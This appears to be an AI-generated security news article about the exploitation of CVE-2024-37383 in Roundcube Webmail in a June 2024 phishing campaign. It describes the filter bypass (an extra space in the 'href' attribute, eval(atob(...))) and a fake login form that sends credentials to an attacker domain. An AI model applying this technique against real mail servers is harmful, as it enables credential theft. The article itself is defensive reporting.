Ethical Hacking News
Unknown threat actors have exploited a now-patched vulnerability in Roundcube Webmail as part of a phishing campaign aimed at stealing user credentials from the open-source webmail software. Researchers warn that vulnerabilities in Roundcube Webmail continue to be a frequent target for cybercriminals, particularly due to its prevalent use by government agencies.
Unknown threat actor exploits CVE-2024-37383 vulnerability in Roundcube Webmail to steal user credentials. Targeted phishing campaign using empty body emails with malicious attachments. Patch versions 1.5.7 and above are recommended to prevent exploitation. Attackers can execute arbitrary JavaScript code, potentially leading to identity theft or further malicious activities.
In the ever-evolving landscape of cybersecurity threats, the recent discovery of an unknown threat actor exploiting a now-patched vulnerability in Roundcube Webmail serves as a stark reminder of the ongoing cat-and-mouse game between security professionals and cybercriminals. According to researchers from Positive Technologies, the vulnerable software was targeted by malicious actors in a phishing campaign aimed at stealing sensitive user credentials.
The specific vulnerability exploited, tracked as CVE-2024-37383 (CVSS score: 6.1), impacts Roundcube Webmail versions before 1.5.7 and 1.6.x before 1.6.7. This means that even though the vulnerability has been addressed in the latest versions of the software, users who are still running outdated versions may be at risk of falling prey to this particular attack vector.
The phishing campaign, which is believed to have occurred in June 2024, involved sending emails with empty bodies and attached documents that were not visible in the email client. However, upon closer inspection, researchers noticed distinctive tags containing the statement eval(atob(…)) used by attackers to decode and execute JavaScript code. Furthermore, an extra space was added to the "href" attribute name, indicating that this was indeed a carefully crafted attempt to exploit the CVE-2024-37383 vulnerability in Roundcube Webmail.
The potential impact of this attack is significant, as an attacker could trigger the vulnerability to execute arbitrary JavaScript code within the recipient's web browser. Moreover, by tricking the recipient into opening a specially crafted email using a vulnerable Roundcube client version, attackers could exploit the vulnerability to steal sensitive user credentials.
As highlighted in the report published by Positive Technologies, when an extra space is added to the "href" attribute name, the syntax will not be filtered and will appear in the final document. Before this addition, it would have been formatted as {attribute name} = {attribute value}. By inserting JavaScript code as the value for "href", attackers can execute it on the Roundcube page whenever a Roundcube client opens a malicious email.
In this particular attack, the JavaScript payload employed by the attackers saves an empty Word document (“Road map.docx”) and retrieves messages from the mail server using the ManageSieve plugin. The attack creates a fake login form in Roundcube's interface, capturing user credentials and sending them to a malicious server (libcdn.org). This domain was registered in 2024.
It is worth noting that vulnerabilities in Roundcube Webmail have been a frequent target for cybercriminals, particularly due to its prevalent use by government agencies. The latest such attack was linked to the Winter Vivern group, which exploited the XSS vulnerability in Roundcube to target government organizations in several European countries. However, based on the available information, this particular attack cannot be directly linked to known actors.
The security implications of this incident are far-reaching, as attacks on software like Roundcube Webmail can result in significant damage. Cybercriminals may use such vulnerabilities to steal sensitive information, compromising user credentials and potentially leading to identity theft or further malicious activities.
In light of this warning, it is essential for organizations using Roundcube Webmail to ensure they have patched their systems with the latest versions that address the CVE-2024-37383 vulnerability. Furthermore, end-users must remain vigilant when opening emails from unfamiliar senders and avoid clicking on links or downloading attachments without verifying their authenticity.
As cybersecurity threats continue to evolve at an alarming rate, it is crucial for individuals and organizations alike to stay informed about emerging vulnerabilities and develop robust security measures to counter these threats.
Related Information:
https://securityaffairs.com/170055/hacking/roundcube-flaw-exploited-in-phishing-attack.html
https://nvd.nist.gov/vuln/detail/CVE-2024-37383
https://www.cvedetails.com/cve/CVE-2024-37383/
Published: Mon Oct 21 12:57:43 2024 by llama3.2 3B Q4_K_M
